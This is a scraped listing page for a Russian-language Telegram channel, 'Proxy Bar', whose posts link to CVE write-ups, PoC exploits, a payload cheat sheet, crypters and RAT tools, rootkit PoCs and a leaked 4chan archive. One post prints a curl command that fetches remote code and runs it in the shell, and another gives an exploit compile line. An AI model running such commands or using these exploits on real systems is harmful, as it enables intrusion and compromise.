Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
Труха⚡️Україна
Труха⚡️Україна
Николаевский Ванёк
Николаевский Ванёк
Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
Труха⚡️Україна
Труха⚡️Україна
Николаевский Ванёк
Николаевский Ванёк
Proxy Bar avatar

Proxy Bar

Exploits, Hacking and Leaks
Чат группы - https://t.me/chat_proxy_bar
Связь с администрацией и реклама:
admin@proxy-bar.org
Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
TGlist रेटिंग
0
0
प्रकारसार्वजनिक
सत्यापन
असत्यापित
विश्वसनीयता
अविश्वसनीय
स्थानРосія
भाषाअन्य
चैनल निर्माण की तिथिNov 17, 2021
TGlist में जोड़ा गया
Nov 18, 2024

समूह "Proxy Bar" में नवीनतम पोस्ट

😁
Завтракаем с CVE-2025-21756
*
Details
*
Exploit for linux kernel 6.6.75
CVE-2024-53141: Linux Kernel Flaw Enables Privilege Escalation
*
kernel: lts-6.6.62

POC exploit
Critical Erlang/OTP SSH Vulnerability RCE
*
(CVSS 10.0)
Сломали лицо фейспалмом на ровном месте.
*
Читать
*
О чем вообще речь, отбитые ребята из Erlang/OTP, когда то взяли, да и запили свою реализацию SSH (релизы от хакеров из богоПодобной OpenBSD != true)
Потом пришли любители 3Dparty из RabbitMQ употребили этот релиз.
Ну а дальше любители админ-панелей и кастомных CLI интерфейсов.
Как зарядить простой ERLANG shell ?
НУ вот ssh srv на 1337 порту:
ssh:daemon(1337, [{system_dir, "/etc/ssh"}, {user_dir, "/home/user/.ssh"}]).

Казалось бы, такую дичь еще нужно умудриться найти, НО !
поиск по шоданам\фофам\хантерам отдает:
Results 27 922
Однако, здравствуйте 0_о
Dirty Pagetable Method
*
Редирект памяти из USERSPACE в KERNELSPACE
CVE-2025-24076 and CVE-2025-24994
*
300 Milliseconds to Admin: Mastering DLL Hijacking and Hooking to Win the Race
Windows Privilege Escalations
А вот и поломанный altchan / 4chan
*
download archive
ElfDoor-gcc is an (LD_PRELOAD)
*
Link
से पुनः पोस्ट किया:
Cyberwave 2025 avatar
Cyberwave 2025
#cyberwave2025 29 апреля в Санкт-Петербурге впервые пройдёт конференция Cyberwave 2025. Уникальная локация, Планетарий №1, на день соберёт под крупнейшим в мире проекционным куполом экспертов по кибербезопасности, начинающих ИБ-специалистов в поисках полезных связей и бизнес, нуждающийся в талантливых кадрах.

🔤🔤🔤🔤🔤🔤🔤🔤🔤 2️⃣0️⃣2️⃣5️⃣ — это:

✍️ Выступления ведущих исследователей от мира инфобеза. От пентеста и работы с уязвимостями до утечек информации и антифрода — реальные кейсы, практический опыт и никаких скучных лекций.
😎 CTF Battle, Online Hack Quest и Hardware Hack Zone. Классика ИБ с захватом флага, хак-квестом и воркшопом по взлому железа для всех желающих показать свои навыки форензики, реверс-инжиниринга и криптографии.
☺️ Интерактивная выставка ретротехники от RetroTech Squad. Тёплые ламповые компьютеры и легендарные консоли с турнирами по Ultimate Mortal Kombat 3 на Sega, Tekken 3 на PS1 и привкусом ностальгии.
☺️ Афтепати. С обменом впечатлениями, общением с единомышленниками, нетворкингом и возможностью на других посмотреть и себя показать.

Ты пентестер, этичный хакер, багхантер, разработчик средств защиты или исследователь уязвимостей? Cyberwave 2025 — событие для тебя.

Ты студент-безопасник, ждавший возможности помахать сертификатом с CTF-батла перед потенциальными рекрутерами? На Cyberwave 2025 тебе будут рады.

Ты представитель бизнеса, заинтересованный в повышении киберустойчивости своей компании? На Cyberwave 2025 соберутся люди, которые знают об этом всё.

Участие в конференции бесплатное, зарегистрироваться можно здесь. Количество мест ограничено! Вся информация о Cyberwave 2025 доступна на сайте, а пока подписывайтесь на канал — мы подробнее расскажем о конференции, наших спикерах и ключевых событиях дня.

Санкт-Петербург, 29 апреля, Планетарий №1. Присоединяйтесь, будет интересно!

@cyberwave_sec
С днем космонавтики !
*
Информация для жителей СПБ:
По этому поводу ЗАВТРА
В Петропавловской крепости с 11 до 18 пройдет космо-party.
Старты моделей ракет, свободный вход в музей космонавтики и ракетной техники.
А в Атриуме Комендантского дома - встреча с космонавтами.
BlackHat Asia 2025- Peng-On Bug to Rule Them All

PDF
CVE-2025-22457
*
Ivanti Zero-Day
Exploitation of CLFS zero-day leads to ransomware activity
*
read
Такие дела, дружок пирожок

रिकॉर्ड

19.04.202523:59
18.1Kसदस्य
09.09.202423:59
0उद्धरण सूचकांक
01.04.202513:28
4.1Kप्रति पोस्ट औसत दृश्य
02.03.202513:28
4.1Kप्रति विज्ञापन पोस्ट औसत दृश्य
25.01.202523:59
62.71%ER
01.04.202513:28
23.06%ERR

Proxy Bar के लोकप्रिय पोस्ट

01.04.202517:42
CVE-20250401 - 7350pipe - Linux Privilege Escalation 😆
*
Мисконфиг SUID на /usr/bin/passwd (зы: если ASLR и NX включены, скорее всего, просто так не запустится)
РАУНД 2
gcc -z execstack -fno-stack-protector exploit.c -o exploit

*
#include 
Search for All Leaked Keys & Secrets
*
Сила Regex
CVE-20250401 - 7350pipe - Linux Privilege Escalation
(all versions)
календарь чекаем
“. <(curl -SsfL https://thc.org/7350pipe)”
Фанатам hashcat
*
Phatcrack - тот же кот в сапогах только с веб мордой и в Docker

Link
17.04.202518:55
Critical Erlang/OTP SSH Vulnerability RCE
*
(CVSS 10.0)
Сломали лицо фейспалмом на ровном месте.
*
Читать
*
О чем вообще речь, отбитые ребята из Erlang/OTP, когда то взяли, да и запили свою реализацию SSH (релизы от хакеров из богоПодобной OpenBSD != true)
Потом пришли любители 3Dparty из RabbitMQ употребили этот релиз.
Ну а дальше любители админ-панелей и кастомных CLI интерфейсов.
Как зарядить простой ERLANG shell ?
НУ вот ssh srv на 1337 порту:
ssh:daemon(1337, [{system_dir, "/etc/ssh"}, {user_dir, "/home/user/.ssh"}]).

Казалось бы, такую дичь еще нужно умудриться найти, НО !
поиск по шоданам\фофам\хантерам отдает:
Results 27 922
Однако, здравствуйте 0_о
Telegram Mac RCE - 0Day
*
господам из opzero.ru подготовить счетные машинки
*
ШУМ
24.03.202509:53
URL Validation Bypass Cheat Sheet has 200+ Payloads for all occasions!
*
Тыц
😁
CVE-2025-2005 WordPress
*
Front-End Users Plugin
Version Affected: <= 3.2.32
*
2 POC Exploit
Scorpio
*
FUD crypters and RAT tools
*
Link
*
Подробные инструкции для бесплатного блэкушного софта , это конечно та еще мышеловка
VectorKernel: PoCs for Kernelmode rootkit techniques research
*
read.MD

#windows #rootkit
CVE-2024-53141: Linux Kernel Flaw Enables Privilege Escalation
*
kernel: lts-6.6.62

POC exploit
Three bypasses (не считая собаки) of Ubuntu's unprivileged user namespace restrictions
*
read TXT
01.04.202505:29
Facebook SMS-based Two-Factor Authentication Bypass
*
WriteUP
*
August 3, 2024: Fixed
अधिक कार्यक्षमता अनलॉक करने के लिए लॉगिन करें।